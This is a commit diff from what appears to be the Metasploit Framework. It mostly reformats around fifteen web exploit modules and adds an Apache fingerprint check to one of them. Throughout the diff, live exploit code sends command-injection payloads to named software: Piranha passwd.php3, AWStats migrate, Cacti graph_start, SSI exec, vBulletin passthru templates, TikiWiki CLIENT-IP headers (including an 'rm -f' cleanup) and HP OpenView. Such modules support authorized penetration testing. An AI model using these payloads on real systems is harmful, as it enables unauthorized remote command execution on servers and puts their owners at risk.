various minor fixes, some added fingerprinting

git-svn-id: file:///home/svn/framework3/trunk@9671 4d416f70-5f16-0410-b530-b9f4589650da

modules/exploits/linux/http/piranha_passwd_exec.rb

@@ -63,6 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Compat'      =>
 						{
 							'PayloadType' => 'cmd',
+							'RequiredCmd' => 'generic perl'
 						}
 				},
 			'Targets'        =>
@@ -80,6 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def exploit
+		info = http_fingerprint
+		if not (info =~ /Apache/)
+			raise RuntimeError, 'The target server is not running Apache.'
+		end
+
 		cmd = Rex::Text.uri_encode(payload.encoded, 'hex-normal')
 		str = "/piranha/secure/passwd.php3?try1=q+;#{cmd}&try2=q+;#{cmd}&passwd=ACCEPT"
 		print_status("Sending GET request with encoded command line...")

modules/exploits/multi/http/tomcat_mgr_deploy.rb

@@ -83,7 +83,6 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Platform' => 'linux'
 						},
 					],
-
 				],
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Nov 09 2009'))

modules/exploits/unix/http/contentkeeperweb_mimencode.rb

@@ -18,26 +18,26 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'ContentKeeper Web Remote Command Execution',
-			'Description'	=> %q{
-				This module exploits the ContentKeeper Web Appliance. Versions prior
+			'Name'		   => 'ContentKeeper Web Remote Command Execution',
+			'Description'  => %q{
+					This module exploits the ContentKeeper Web Appliance. Versions prior
 				to 125.10 are affected. This module exploits a combination of weaknesses
 				to enable remote command execution as the Apache user. Following exploitation
 				it is possible to abuse an insecure PATH call to 'ps' etc in setuid 'benetool'
 				to escalate to root.
 			},
-			'Author' 	=> [ 'patrick' ],
-			'Arch'		=> [ ARCH_CMD ],
-			'License'       => MSF_LICENSE,
-			'Version'       => '$Revision$',
-			'References'    =>
-			[
-				[ 'OSVDB', '54551'],
-				[ 'OSVDB', '54552'],
-				[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
-			],
-			'Privileged'		=> false,
-			'Payload'        =>
+			'Author' 	   => [ 'patrick' ],
+			'Arch'		   => [ ARCH_CMD ],
+			'License'      => MSF_LICENSE,
+			'Version'      => '$Revision$',
+			'References'   =>
+				[
+					[ 'OSVDB', '54551'],
+					[ 'OSVDB', '54552'],
+					[ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],
+				],
+			'Privileged'	=> false,
+			'Payload'      =>
 				{
 					'DisableNops' => true,
 					'Space'       => 1024,
@@ -47,15 +47,15 @@ class Metasploit3 < Msf::Exploit::Remote
 							'RequiredCmd' => 'generic perl ruby telnet',
 						}
 				},
-			'Platform' => ['unix'],
-			'Targets'  =>
-			[
-				[ 'Automatic', { } ]
-			],
+			'Platform'     => ['unix'],
+			'Targets'      =>
+				[
+					[ 'Automatic', { } ]
+				],
 			'DisclosureDate' => 'Feb 25 2009',
 			'DefaultTarget' => 0))
 
-			register_options(
+		register_options(
 			[
 				Opt::RPORT(80),
 			],self.class)

modules/exploits/unix/webapp/awstats_migrate_exec.rb

@@ -23,10 +23,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'AWStats migrate Remote Command Execution',
 			'Description'    => %q{
 					This module exploits an arbitrary command execution vulnerability in the
-					AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
-					payloads are recommended with this module. The vulnerability is only
-					present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
-					configuration file (non-default).
+				AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based
+				payloads are recommended with this module. The vulnerability is only
+				present when AllowToUpdateStatsFromBrowser is enabled in the AWstats
+				configuration file (non-default).
 			},
 			'Author'         => [ 'patrick' ],
 			'License'        => MSF_LICENSE,
@@ -56,21 +56,21 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DisclosureDate' => 'May 04 2006',
 			'DefaultTarget'  => 0))
 
-			register_options(
-				[
-					OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
-					OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
-				], self.class)
+		register_options(
+			[
+				OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]),
+				OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]),
+			], self.class)
 	end
 
 	def check
 		res = send_request_cgi({
 			'uri'      => datastore['URI'],
 			'vars_get' =>
-			{
-				'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
-			}
-		}, 25)
+				{
+					'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt"
+				}
+			}, 25)
 
 		if (res and res.body.match(/localhost/))
 			return Exploit::CheckCode::Vulnerable
@@ -87,11 +87,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'uri'     => sploit,
 			'method'  => 'GET',
 			'headers' =>
-			{
-				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
-				'Connection' => 'Close',
-			}
-		}, 25)
+				{
+					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
+					'Connection' => 'Close',
+				}
+			}, 25)
 
 		if (res)
 			print_status("The server returned: #{res.code} #{res.message}")

modules/exploits/unix/webapp/cacti_graphimage_exec.rb

@@ -30,8 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
-					['OSVDB', '17539'],
-					['BID', '14042'],
+					[ 'OSVDB', '17539' ],
+					[ 'BID', '14042' ],
 				],
 			'Privileged'     => false,
 			'Payload'        =>
@@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DisclosureDate' => 'Jan 15 2005',
 			'DefaultTarget' => 0))
 
-			register_options(
-				[
-					OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),
-				], self.class)
+		register_options(
+			[
+				OptString.new('URI', [true, "The full URI path to graph_view.php", "/cacti/graph_view.php"]),
+			], self.class)
 	end
 
 	def exploit
@@ -61,10 +61,10 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi({
 			'uri'      => datastore['URI'],
 			'vars_get' =>
-			{
-				'action' => 'list'
-			}
-		}, 10)
+				{
+					'action' => 'list'
+				}
+			}, 10)
 
 		if (not res)
 			print_error("The server gave no response")
@@ -81,11 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		res = send_request_cgi({
 			'uri'      => datastore['URI'],
 			'vars_get' =>
-			{
-				'local_graph_id' => m[1],
-				'graph_start'    => "\necho YYY;#{payload.encoded};echo YYY;echo\n"
-			}
-		}, 25)
+				{
+					'local_graph_id' => m[1],
+					'graph_start'    => "\necho YYY;#{payload.encoded};echo YYY;echo\n"
+				}
+			}, 25)
 
 		if (res)
 			print_status("The server returned: #{res.code} #{res.message}")

modules/exploits/unix/webapp/coppermine_piceditor.rb

@@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'quality' => '50',  # not required, but fixes an error message
 					'newimage' => img
 				}
-		}, 25)
+			}, 25)
 
 		if (res and res.code == 200)
 			print_status("Successfully POST'd exploit data")

modules/exploits/unix/webapp/guestbook_ssi_exec.rb

@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		email		= rand_text_alphanumeric(20)
 		city		= rand_text_alphanumeric(20)
 		state		= rand_text_alphanumeric(20)
-		country		= rand_text_alphanumeric(20)
+		country 	= rand_text_alphanumeric(20)
 
 		sploit = Rex::Text.uri_encode("<!--#exec cmd=\"" + payload.encoded.gsub('"','\"') + "\"", 'hex-normal')
 

modules/exploits/unix/webapp/openview_connectednodes_exec.rb

@@ -61,12 +61,12 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Trigger the command execution bug
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
-			'vars_get' =>
-			{
-				'node'    => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"!
-			}
-		}, 25)
+				'uri'      => datastore['URI'],
+				'vars_get' =>
+					{
+						'node'    => %Q!; echo YYY; #{payload.encoded}; echo YYY| tr "\\n" "#{0xa3.chr}"!
+					}
+				}, 25)
 
 		if (res)
 			print_status("The server returned: #{res.code} #{res.message}")

modules/exploits/unix/webapp/php_include.rb

@@ -26,7 +26,6 @@ class Metasploit3 < Msf::Exploit::Remote
 				where the application includes code like the following:
 
 				<?php include($_GET['path']); ?>
-
 			},
 			'Author'         => [ 'hdm' , 'egypt' ],
 			'License'        => MSF_LICENSE,

modules/exploits/unix/webapp/php_vbulletin_template.rb

@@ -27,23 +27,29 @@ class Metasploit3 < Msf::Exploit::Remote
 				is enabled. All versions of vBulletin prior to 3.0.7 are
 				affected.
 			},
-			'Author'         => [ 'str0ke <str0ke[at]milw0rm.com>', 'cazz' ],
+			'Author'         =>
+				[
+					'str0ke <str0ke[at]milw0rm.com>',
+					'cazz'
+				],
 			'License'        => BSD_LICENSE,
 			'Version'        => '$Revision$',
-			'References'     => [
-				[ 'CVE', '2005-0511'],
-				[ 'BID', '12622'],
-				[ 'OSVDB', '14047'],
-			],
+			'References'     =>
+				[
+					[ 'CVE', '2005-0511' ],
+					[ 'BID', '12622' ],
+					[ 'OSVDB', '14047' ],
+				],
 			'Privileged'     => false,
 			'Platform'       => ['unix', 'solaris'],
-			'Payload'        => {
-					'Space' => 512,
+			'Payload'        =>
+				{
+					'Space'       => 512,
 					'DisableNops' => true,
-					'Keys'  => ['cmd', 'cmd_bash'],
+					'Keys'        => ['cmd', 'cmd_bash'],
 				},
 			'Targets'        => [ ['Automatic', { }], ],
-			'DefaultTarget' => 0,
+			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Feb 25 2005'
 			))
 
@@ -64,14 +70,14 @@ class Metasploit3 < Msf::Exploit::Remote
 		encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
 
 		res = send_request_cgi({
-			'uri'      => datastore['PATH'],
-			'method'   => 'GET',
-			'vars_get' =>
-			{
-				'do' => "page",
-				'template' => "{${passthru(#{encoded})}}"
-			}
-		}, 5)
+				'uri'      => datastore['PATH'],
+				'method'   => 'GET',
+				'vars_get' =>
+					{
+						'do' => "page",
+						'template' => "{${passthru(#{encoded})}}"
+					}
+			}, 5)
 
 		if (res and res.body)
 			b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)

modules/exploits/unix/webapp/php_wordpress_lastpost.rb

@@ -71,9 +71,9 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		# Trigger the command execution bug
 		res = send_request_cgi({
-			'uri'      => datastore['URI'],
-			'cookie'   => data
-		}, 25)
+				'uri'      => datastore['URI'],
+				'cookie'   => data
+			}, 25)
 
 		if (res)
 			print_status("The server returned: #{res.code} #{res.message}")

modules/exploits/unix/webapp/php_xmlrpc_eval.rb

@@ -78,12 +78,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		"</methodCall>";
 
 		res = send_request_cgi({
-			'uri'          => datastore['PATH'],
-			'method'       => 'POST',
-			'ctype'        => 'application/xml',
-			'data'         => xml,
-		}, 5)
-
+				'uri'          => datastore['PATH'],
+				'method'       => 'POST',
+				'ctype'        => 'application/xml',
+				'data'         => xml,
+			}, 5)
 
 		if (res and res.body)
 			b = /#{wrapper}(.*)#{wrapper}/sm.match(res.body)

modules/exploits/unix/webapp/phpbb_highlight.rb

@@ -75,8 +75,8 @@ class Metasploit3 < Msf::Exploit::Remote
 		1.upto(32) do |x|
 
 		res = send_request_raw({
-			'uri'	=> datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
-		}, 25)
+				'uri'	=> datastore['URI'] + '/viewtopic.php?topic=' + x.to_s,
+			}, 25)
 
 		if (res and res.body.match(/class="postdetails"/))
 			print_status("Discovered valid topic ID: #{x}")

modules/exploits/unix/webapp/tikiwiki_graph_formula_exec.rb

@@ -110,11 +110,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'uri'     => url_db_local,
 			'method'  => 'GET',
 			'headers' =>
-			{
-				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
-				'Connection' => 'Close',
-			}
-		}, 5)
+				{
+					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
+					'Connection' => 'Close',
+				}
+			}, 5)
 		if (res and res.message == "OK" and res.body)
 			print_status("The server returned            : #{res.code} #{res.message}")
 			print_status("Server version                 : #{res.headers['Server']}")
@@ -148,11 +148,11 @@ class Metasploit3 < Msf::Exploit::Remote
 			'uri'     => url_cmd,
 			'method'  => 'GET',
 			'headers' =>
-			{
-				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
-				'Connection' => 'Close',
-			}
-		}, 5)
+				{
+					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
+					'Connection' => 'Close',
+				}
+			}, 5)
 	end
 
 	#

modules/exploits/unix/webapp/tikiwiki_jhot_exec.rb

@@ -55,10 +55,10 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DisclosureDate' => 'Sep 2 2006',
 			'DefaultTarget'  => 0))
 
-			register_options(
-				[
-					OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki/"]),
-				], self.class)
+		register_options(
+			[
+				OptString.new('URI', [true, "TikiWiki directory path", "/tikiwiki/"]),
+			], self.class)
 	end
 
 	def check
@@ -154,7 +154,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'Content-Type' => 'multipart/form-data; boundary=---------------------------7d529a1d23092a',
 					'Connection'   => 'Close',
 				}
-		}, 25)
+			}, 25)
 
 		if (res and res.message == "OK")
 			print_status("Successfully created temporary file.")
@@ -170,12 +170,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'uri'     => url_config,
 			'method'  => 'GET',
 			'headers' =>
-			{
-				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
-				'CLIENT-IP'  => "#{cmd};",
-				'Connection' => 'Close',
-			}
-		}, 25)
+				{
+					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
+					'CLIENT-IP'  => "#{cmd};",
+					'Connection' => 'Close',
+				}
+			}, 25)
 
 		if (res and res.message == "OK" and res.body.match(/my_delim/m))
 			print_status("The server returned            : #{res.code} #{res.message} (#{res.headers['Server']})")
@@ -200,12 +200,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'uri'     => url_config,
 			'method'  => 'GET',
 			'headers' =>
-			{
-				'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
-				'CLIENT-IP'  => 'rm -f tiki-config.php',
-				'Connection' => 'Close',
-			}
-		}, 25)
+				{
+					'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
+					'CLIENT-IP'  => 'rm -f tiki-config.php',
+					'Connection' => 'Close',
+				}
+			}, 25)
 
 		if (res and res.message == "OK")
 			print_status("Successfully remove temporary file.")

modules/exploits/unix/webapp/twiki_history.rb

@@ -119,9 +119,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		query_str << Rex::Text.uri_encode(rev)
 
 		res = send_request_cgi({
-			'method'    => 'GET',
-			'uri'	      => query_str,
-		}, 25)
+				'method'    => 'GET',
+				'uri'	      => query_str,
+			}, 25)
 
 		if (res and res.code == 200)
 			print_status("Successfully sent exploit request")

modules/exploits/unix/webapp/twiki_search.rb

@@ -115,9 +115,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		query_str << Rex::Text.uri_encode(search)
 
 		res = send_request_cgi({
-			'method'    => 'GET',
-			'uri'	      => query_str,
-		}, 25)
+				'method'    => 'GET',
+				'uri'	      => query_str,
+			}, 25)
 
 		if (res and res.code == 200)
 			print_status("Successfully sent exploit request")